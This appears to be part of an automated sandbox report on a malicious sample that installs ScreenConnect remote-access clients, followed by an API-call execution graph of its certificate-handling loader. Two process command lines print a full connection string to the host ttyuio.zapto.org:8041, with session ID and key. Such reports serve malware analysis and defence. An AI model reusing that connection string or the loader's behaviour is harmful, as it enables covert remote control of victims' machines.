                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                        Start time:00:23:00
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                        Start time:00:23:13
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                                        Imagebase:0xff0000
                                                                                                                                                                                                                                                                        File size:601'376 bytes
                                                                                                                                                                                                                                                                        MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.2273256028.0000000000FF2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                        Start time:00:23:14
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                                        Imagebase:0xbc0000
                                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                        Start time:00:23:14
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                                                                                                                                                                                                                                                                        Imagebase:0xbc0000
                                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                                        MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                        Start time:00:23:15
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User"
                                                                                                                                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                                                                                                                                        File size:601'376 bytes
                                                                                                                                                                                                                                                                        MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                                                        Start time:00:24:17
                                                                                                                                                                                                                                                                        Start date:02/10/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System"
                                                                                                                                                                                                                                                                        Imagebase:0xdc0000
                                                                                                                                                                                                                                                                        File size:601'376 bytes
                                                                                                                                                                                                                                                                        MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                                                          Total number of Nodes:1465
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                          execution_graph 5947 839ec3 5948 839ed9 5947->5948 5949 839ecd 5947->5949 5949->5948 5950 839ed2 CloseHandle 5949->5950 5950->5948 6590 831442 6591 831a6a GetModuleHandleW 6590->6591 6592 83144a 6591->6592 6593 831480 6592->6593 6594 83144e 6592->6594 6595 833793 _abort 23 API calls 6593->6595 6596 831459 6594->6596 6599 833775 6594->6599 6597 831488 6595->6597 6600 83355e _abort 23 API calls 6599->6600 6601 833780 6600->6601 6601->6596 6602 833d41 6605 83341b 6602->6605 6606 83342a 6605->6606 6607 833376 15 API calls 6606->6607 6608 833444 6607->6608 6609 833376 15 API calls 6608->6609 6610 83344f 6609->6610 6126 833400 6127 833412 6126->6127 6128 833418 6126->6128 6129 833376 15 API calls 6127->6129 6129->6128 6130 831e00 6134 831e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6130->6134 6131 831e9e _ValidateLocalCookies 6133 831f27 _ValidateLocalCookies 6134->6131 6135 832340 RtlUnwind 6134->6135 6135->6133 5748 833d86 5749 831f7d ___scrt_uninitialize_crt 7 API calls 5748->5749 5750 833d8d 5749->5750 6611 839146 IsProcessorFeaturePresent 5951 8398c5 5953 8398ed 5951->5953 5952 839925 5953->5952 5954 839917 5953->5954 5955 83991e 5953->5955 5960 839997 5954->5960 5964 839980 5955->5964 5961 8399a0 5960->5961 5968 83a06f 5961->5968 5963 83991c 5965 8399a0 5964->5965 5966 83a06f __startOneArgErrorHandling 16 API calls 5965->5966 5967 839923 5966->5967 5969 83a0ae __startOneArgErrorHandling 5968->5969 5971 83a130 __startOneArgErrorHandling 5969->5971 5974 83a472 5969->5974 5973 83a166 _ValidateLocalCookies 5971->5973 5977 83a786 5971->5977 5973->5963 5984 83a495 5974->5984 5978 83a793 5977->5978 5979 83a7a8 5977->5979 5981 8347f9 _free 15 API calls 5978->5981 5982 83a7ad 5978->5982 5980 8347f9 _free 15 API calls 5979->5980 5980->5982 5983 83a7a0 5981->5983 5982->5973 5983->5973 5985 83a4c0 __raise_exc 5984->5985 5986 83a6b9 RaiseException 5985->5986 5987 83a490 5986->5987 5987->5971 5751 834c8a 5756 834cbf 5751->5756 5754 834ca6 5755 834869 _free 15 API calls 5755->5754 5757 834cd1 5756->5757 5766 834c98 5756->5766 5758 834d01 5757->5758 5759 834cd6 5757->5759 5758->5766 5767 83681b 5758->5767 5760 83480c _abort 15 API calls 5759->5760 5762 834cdf 5760->5762 5763 834869 _free 15 API calls 5762->5763 5763->5766 5764 834d1c 5765 834869 _free 15 API calls 5764->5765 5765->5766 5766->5754 5766->5755 5768 836826 5767->5768 5769 83684e 5768->5769 5770 83683f 5768->5770 5771 83685d 5769->5771 5776 837e13 5769->5776 5772 8347f9 _free 15 API calls 5770->5772 5783 837e46 5771->5783 5775 836844 _abort 5772->5775 5775->5764 5777 837e33 HeapSize 5776->5777 5778 837e1e 5776->5778 5777->5771 5779 8347f9 _free 15 API calls 5778->5779 5780 837e23 5779->5780 5781 83473d _abort 21 API calls 5780->5781 5782 837e2e 5781->5782 5782->5771 5784 837e53 5783->5784 5785 837e5e 5783->5785 5787 8362ff 16 API calls 5784->5787 5786 837e66 5785->5786 5793 837e6f _abort 5785->5793 5788 834869 _free 15 API calls 5786->5788 5791 837e5b 5787->5791 5788->5791 5789 837e74 5792 8347f9 _free 15 API calls 5789->5792 5790 837e99 HeapReAlloc 5790->5791 5790->5793 5791->5775 5792->5791 5793->5789 5793->5790 5794 836992 _abort 2 API calls 5793->5794 5794->5793 5795 831489 5798 831853 5795->5798 5797 83148e 5797->5797 5799 831869 5798->5799 5801 831872 5799->5801 5802 831806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5799->5802 5801->5797 5802->5801 6612 831248 6613 831250 6612->6613 6629 8337f7 6613->6629 6615 83125b 6636 831664 6615->6636 6617 83191f 4 API calls 6619 8312f2 6617->6619 6618 831270 __RTC_Initialize 6627 8312cd 6618->6627 6642 8317f1 6618->6642 6621 831289 6621->6627 6645 8318ab InitializeSListHead 6621->6645 6623 83129f 6646 8318ba 6623->6646 6625 8312c2 6652 833891 6625->6652 6627->6617 6628 8312ea 6627->6628 6630 833806 6629->6630 6631 833829 6629->6631 6630->6631 6632 8347f9 _free 15 API calls 6630->6632 6631->6615 6633 833819 6632->6633 6634 83473d _abort 21 API calls 6633->6634 6635 833824 6634->6635 6635->6615 6637 831670 6636->6637 6638 831674 6636->6638 6637->6618 6639 83191f 4 API calls 6638->6639 6641 831681 ___scrt_release_startup_lock 6638->6641 6640 8316ea 6639->6640 6641->6618 6659 8317c4 6642->6659 6645->6623 6697 833e2a 6646->6697 6648 8318cb 6649 8318d2 6648->6649 6650 83191f 4 API calls 6648->6650 6649->6625 6651 8318da 6650->6651 6651->6625 6653 834424 _abort 33 API calls 6652->6653 6654 83389c 6653->6654 6655 8338d4 6654->6655 6656 8347f9 _free 15 API calls 6654->6656 6655->6627 6657 8338c9 6656->6657 6658 83473d _abort 21 API calls 6657->6658 6658->6655 6660 8317d3 6659->6660 6661 8317da 6659->6661 6665 833c81 6660->6665 6668 833cf1 6661->6668 6664 8317d8 6664->6621 6666 833cf1 24 API calls 6665->6666 6667 833c93 6666->6667 6667->6664 6671 8339f8 6668->6671 6674 83392e 6671->6674 6673 833a1c 6673->6664 6675 83393a ___scrt_is_nonwritable_in_current_image 6674->6675 6682 8356e2 EnterCriticalSection 6675->6682 6677 833948 6683 833b40 6677->6683 6679 833955 6693 833973 6679->6693 6681 833966 _abort 6681->6673 6682->6677 6684 833b56 _abort 6683->6684 6685 833b5e 6683->6685 6684->6679 6685->6684 6686 83681b 24 API calls 6685->6686 6692 833bb7 6685->6692 6688 833bad 6686->6688 6687 83681b 24 API calls 6689 833bcd 6687->6689 6690 834869 _free 15 API calls 6688->6690 6691 834869 _free 15 API calls 6689->6691 6690->6692 6691->6684 6692->6684 6692->6687 6696 83572a LeaveCriticalSection 6693->6696 6695 83397d 6695->6681 6696->6695 6698 833e48 6697->6698 6702 833e68 6697->6702 6699 8347f9 _free 15 API calls 6698->6699 6700 833e5e 6699->6700 6701 83473d _abort 21 API calls 6700->6701 6701->6702 6702->6648 5803 833d8f 5804 833db2 5803->5804 5805 833d9e 5803->5805 5806 834869 _free 15 API calls 5804->5806 5805->5804 5807 834869 _free 15 API calls 5805->5807 5808 833dc4 5806->5808 5807->5804 5809 834869 _free 15 API calls 5808->5809 5810 833dd7 5809->5810 5811 834869 _free 15 API calls 5810->5811 5812 833de8 5811->5812 5813 834869 _free 15 API calls 5812->5813 5814 833df9 5813->5814 6136 83430f 6137 83431a 6136->6137 6138 83432a 6136->6138 6142 834330 6137->6142 6141 834869 _free 15 API calls 6141->6138 6143 834343 6142->6143 6144 834349 6142->6144 6145 834869 _free 15 API calls 6143->6145 6146 834869 _free 15 API calls 6144->6146 6145->6144 6147 834355 6146->6147 6148 834869 _free 15 API calls 6147->6148 6149 834360 6148->6149 6150 834869 _free 15 API calls 6149->6150 6151 83436b 6150->6151 6152 834869 _free 15 API calls 6151->6152 6153 834376 6152->6153 6154 834869 _free 15 API calls 6153->6154 6155 834381 6154->6155 6156 834869 _free 15 API calls 6155->6156 6157 83438c 6156->6157 6158 834869 _free 15 API calls 6157->6158 6159 834397 6158->6159 6160 834869 _free 15 API calls 6159->6160 6161 8343a2 6160->6161 6162 834869 _free 15 API calls 6161->6162 6163 8343b0 6162->6163 6168 8341f6 6163->6168 6174 834102 6168->6174 6170 83421a 6171 834246 6170->6171 6187 834163 6171->6187 6173 83426a 6173->6141 6175 83410e ___scrt_is_nonwritable_in_current_image 6174->6175 6182 8356e2 EnterCriticalSection 6175->6182 6178 834118 6180 834869 _free 15 API calls 6178->6180 6181 834142 6178->6181 6179 83414f _abort 6179->6170 6180->6181 6183 834157 6181->6183 6182->6178 6186 83572a LeaveCriticalSection 6183->6186 6185 834161 6185->6179 6186->6185 6188 83416f ___scrt_is_nonwritable_in_current_image 6187->6188 6195 8356e2 EnterCriticalSection 6188->6195 6190 834179 6191 8343d9 _abort 15 API calls 6190->6191 6192 83418c 6191->6192 6196 8341a2 6192->6196 6194 83419a _abort 6194->6173 6195->6190 6199 83572a LeaveCriticalSection 6196->6199 6198 8341ac 6198->6194 6199->6198 5988 8355ce GetCommandLineA GetCommandLineW 5032 83130d 5033 831319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 83162b 5033->5060 5035 831320 5036 831473 5035->5036 5045 83134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5045 5112 83191f IsProcessorFeaturePresent 5036->5112 5038 83147a 5039 831480 5038->5039 5116 8337e1 5038->5116 5119 833793 5039->5119 5043 831369 5044 8313ea 5068 831a34 5044->5068 5045->5043 5045->5044 5097 8337a9 5045->5097 5052 831405 5103 831a6a GetModuleHandleW 5052->5103 5055 831410 5056 831419 5055->5056 5105 833784 5055->5105 5108 83179c 5056->5108 5061 831634 5060->5061 5122 831bd4 IsProcessorFeaturePresent 5061->5122 5065 831645 5066 831649 5065->5066 5132 831f7d 5065->5132 5066->5035 5192 8320b0 5068->5192 5070 831a47 GetStartupInfoW 5071 8313f0 5070->5071 5072 833457 5071->5072 5194 83522b 5072->5194 5074 8313f8 5077 831000 6 API calls 5074->5077 5075 833460 5075->5074 5198 8355b6 5075->5198 5078 8311e3 Sleep 5077->5078 5079 831096 CryptMsgGetParam 5077->5079 5080 8311f7 5078->5080 5081 831215 CertCloseStore LocalFree LocalFree LocalFree 5078->5081 5082 831162 CryptMsgGetParam 5079->5082 5083 8310bc LocalAlloc 5079->5083 5080->5081 5087 83120a CertDeleteCertificateFromStore 5080->5087 5081->5052 5082->5078 5086 831174 CryptMsgGetParam 5082->5086 5084 8310d7 5083->5084 5085 831156 LocalFree 5083->5085 5088 8310e0 LocalAlloc CryptMsgGetParam 5084->5088 5085->5082 5086->5078 5089 831188 CertFindAttribute CertFindAttribute 5086->5089 5087->5080 5092 831114 CertCreateCertificateContext 5088->5092 5093 83113d LocalFree 5088->5093 5090 8311b1 5089->5090 5091 8311b5 LoadLibraryA GetProcAddress 5089->5091 5090->5078 5090->5091 5091->5078 5094 831133 CertFreeCertificateContext 5092->5094 5095 831126 CertAddCertificateContextToStore 5092->5095 5093->5088 5096 83114d 5093->5096 5094->5093 5095->5094 5096->5085 5098 8337d1 _abort 5097->5098 5098->5044 5099 834424 _abort 33 API calls 5098->5099 5102 833e9a 5099->5102 5100 833f24 _abort 33 API calls 5101 833ec4 5100->5101 5102->5100 5104 83140c 5103->5104 5104->5038 5104->5055 5686 83355e 5105->5686 5107 83378f 5107->5056 5110 8317a8 ___scrt_uninitialize_crt 5108->5110 5109 831421 5109->5043 5110->5109 5111 831f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 831935 _abort 5112->5113 5114 8319e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 831a24 _abort 5114->5115 5115->5038 5117 83355e _abort 23 API calls 5116->5117 5118 8337f2 5117->5118 5118->5039 5120 83355e _abort 23 API calls 5119->5120 5121 831488 5120->5121 5123 831640 5122->5123 5124 831f5e 5123->5124 5138 8324b1 5124->5138 5128 831f6f 5129 831f7a 5128->5129 5152 8324ed 5128->5152 5129->5065 5131 831f67 5131->5065 5133 831f90 5132->5133 5134 831f86 5132->5134 5133->5066 5135 832496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 831f8b 5135->5136 5137 8324ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5133 5139 8324ba 5138->5139 5141 8324e3 5139->5141 5142 831f63 5139->5142 5156 83271d 5139->5156 5143 8324ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5131 5144 832463 5142->5144 5143->5142 5173 83262e 5144->5173 5147 832478 5147->5128 5150 832493 5150->5128 5153 832517 5152->5153 5154 8324f8 5152->5154 5153->5131 5155 832502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 832543 5156->5161 5159 832740 5159->5139 5160 832755 InitializeCriticalSectionAndSpinCount 5160->5159 5162 832560 5161->5162 5165 832564 5161->5165 5162->5159 5162->5160 5163 8325cc GetProcAddress 5163->5162 5165->5162 5165->5163 5166 8325bd 5165->5166 5168 8325e3 LoadLibraryExW 5165->5168 5166->5163 5167 8325c5 FreeLibrary 5166->5167 5167->5163 5169 8325fa GetLastError 5168->5169 5170 83262a 5168->5170 5169->5170 5171 832605 ___vcrt_InitializeCriticalSectionEx 5169->5171 5170->5165 5171->5170 5172 83261b LoadLibraryExW 5171->5172 5172->5165 5174 832543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5173->5174 5175 832648 5174->5175 5176 832661 TlsAlloc 5175->5176 5177 83246d 5175->5177 5177->5147 5178 8326df 5177->5178 5179 832543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5178->5179 5180 8326f9 5179->5180 5181 832714 TlsSetValue 5180->5181 5182 832486 5180->5182 5181->5182 5182->5150 5183 832496 5182->5183 5184 8324a0 5183->5184 5185 8324a6 5183->5185 5187 832669 5184->5187 5185->5147 5188 832543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5187->5188 5189 832683 5188->5189 5190 83269b TlsFree 5189->5190 5191 83268f 5189->5191 5190->5191 5191->5185 5193 8320c7 5192->5193 5193->5070 5193->5193 5195 835234 5194->5195 5197 83523d 5194->5197 5201 83512a 5195->5201 5197->5075 5683 83555d 5198->5683 5221 834424 GetLastError 5201->5221 5203 835137 5241 835249 5203->5241 5205 83513f 5250 834ebe 5205->5250 5208 835156 5208->5197 5212 83518c 5214 835194 5212->5214 5215 8351b1 5212->5215 5272 8347f9 5214->5272 5217 8351dd 5215->5217 5218 834869 _free 15 API calls 5215->5218 5220 835199 5217->5220 5281 834d94 5217->5281 5218->5217 5275 834869 5220->5275 5222 834440 5221->5222 5223 83443a 5221->5223 5228 83448f SetLastError 5222->5228 5289 83480c 5222->5289 5284 835904 5223->5284 5227 83445a 5230 834869 _free 15 API calls 5227->5230 5228->5203 5232 834460 5230->5232 5231 83446f 5231->5227 5233 834476 5231->5233 5234 83449b SetLastError 5232->5234 5301 834296 5233->5301 5306 833f24 5234->5306 5239 834869 _free 15 API calls 5240 834488 5239->5240 5240->5228 5240->5234 5242 835255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 834424 _abort 33 API calls 5242->5243 5245 83525f 5243->5245 5247 833f24 _abort 33 API calls 5245->5247 5248 8352e3 _abort 5245->5248 5249 834869 _free 15 API calls 5245->5249 5542 8356e2 EnterCriticalSection 5245->5542 5543 8352da 5245->5543 5247->5245 5248->5205 5249->5245 5547 833f72 5250->5547 5253 834ef1 5255 834f08 5253->5255 5256 834ef6 GetACP 5253->5256 5254 834edf GetOEMCP 5254->5255 5255->5208 5257 8362ff 5255->5257 5256->5255 5258 83633d 5257->5258 5263 83630d _abort 5257->5263 5259 8347f9 _free 15 API calls 5258->5259 5261 835167 5259->5261 5260 836328 HeapAlloc 5260->5261 5260->5263 5261->5220 5264 8352eb 5261->5264 5262 836992 _abort 2 API calls 5262->5263 5263->5258 5263->5260 5263->5262 5265 834ebe 35 API calls 5264->5265 5266 83530a 5265->5266 5267 83535b IsValidCodePage 5266->5267 5269 835311 _ValidateLocalCookies 5266->5269 5271 835380 _abort 5266->5271 5268 83536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5212 5584 834f96 GetCPInfo 5271->5584 5273 8344a8 _free 15 API calls 5272->5273 5274 8347fe 5273->5274 5274->5220 5276 83489d _free 5275->5276 5277 834874 HeapFree 5275->5277 5276->5208 5277->5276 5278 834889 5277->5278 5279 8347f9 _free 13 API calls 5278->5279 5280 83488f GetLastError 5279->5280 5280->5276 5647 834d51 5281->5647 5283 834db8 5283->5220 5317 835741 5284->5317 5286 83592b 5287 835943 TlsGetValue 5286->5287 5288 835937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5222 5295 834819 _abort 5289->5295 5290 834859 5292 8347f9 _free 14 API calls 5290->5292 5291 834844 HeapAlloc 5293 834452 5291->5293 5291->5295 5292->5293 5293->5227 5296 83595a 5293->5296 5295->5290 5295->5291 5330 836992 5295->5330 5297 835741 _abort 5 API calls 5296->5297 5298 835981 5297->5298 5299 835990 _ValidateLocalCookies 5298->5299 5300 83599c TlsSetValue 5298->5300 5299->5231 5300->5299 5344 83426e 5301->5344 5452 836b14 5306->5452 5309 833f35 5311 833f3e IsProcessorFeaturePresent 5309->5311 5316 833f5c 5309->5316 5312 833f49 5311->5312 5480 834573 5312->5480 5313 833793 _abort 23 API calls 5315 833f66 5313->5315 5316->5313 5318 835771 _abort 5317->5318 5319 83576d 5317->5319 5318->5286 5319->5318 5321 835791 5319->5321 5323 8357dd 5319->5323 5321->5318 5322 83579d GetProcAddress 5321->5322 5322->5318 5324 8357fe LoadLibraryExW 5323->5324 5329 8357f3 5323->5329 5325 835833 5324->5325 5326 83581b GetLastError 5324->5326 5328 83584a FreeLibrary 5325->5328 5325->5329 5326->5325 5327 835826 LoadLibraryExW 5326->5327 5327->5325 5328->5329 5329->5319 5333 8369d6 5330->5333 5332 8369a8 _ValidateLocalCookies 5332->5295 5334 8369e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 8356e2 EnterCriticalSection 5334->5339 5336 8369ed 5340 836a1f 5336->5340 5338 836a14 _abort 5338->5332 5339->5336 5343 83572a LeaveCriticalSection 5340->5343 5342 836a26 5342->5338 5343->5342 5350 8341ae 5344->5350 5346 834292 5347 83421e 5346->5347 5361 8340b2 5347->5361 5349 834242 5349->5239 5351 8341ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 8356e2 EnterCriticalSection 5351->5356 5353 8341c4 5357 8341ea 5353->5357 5355 8341e2 _abort 5355->5346 5356->5353 5360 83572a LeaveCriticalSection 5357->5360 5359 8341f4 5359->5355 5360->5359 5362 8340be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 8356e2 EnterCriticalSection 5362->5369 5364 8340c8 5370 8343d9 5364->5370 5366 8340e0 5374 8340f6 5366->5374 5368 8340ee _abort 5368->5349 5369->5364 5371 8343e8 __fassign 5370->5371 5372 83440f __fassign 5370->5372 5371->5372 5377 836507 5371->5377 5372->5366 5451 83572a LeaveCriticalSection 5374->5451 5376 834100 5376->5368 5378 836587 5377->5378 5383 83651d 5377->5383 5379 8365d5 5378->5379 5381 834869 _free 15 API calls 5378->5381 5445 83667a 5379->5445 5384 8365a9 5381->5384 5382 836550 5385 836572 5382->5385 5393 834869 _free 15 API calls 5382->5393 5383->5378 5383->5382 5388 834869 _free 15 API calls 5383->5388 5386 834869 _free 15 API calls 5384->5386 5387 834869 _free 15 API calls 5385->5387 5389 8365bc 5386->5389 5390 83657c 5387->5390 5392 836545 5388->5392 5394 834869 _free 15 API calls 5389->5394 5395 834869 _free 15 API calls 5390->5395 5391 836643 5396 834869 _free 15 API calls 5391->5396 5405 836078 5392->5405 5398 836567 5393->5398 5399 8365ca 5394->5399 5395->5378 5400 836649 5396->5400 5433 836176 5398->5433 5403 834869 _free 15 API calls 5399->5403 5400->5372 5401 8365e3 5401->5391 5404 834869 15 API calls _free 5401->5404 5403->5379 5404->5401 5406 836089 5405->5406 5432 836172 5405->5432 5407 83609a 5406->5407 5408 834869 _free 15 API calls 5406->5408 5409 8360ac 5407->5409 5411 834869 _free 15 API calls 5407->5411 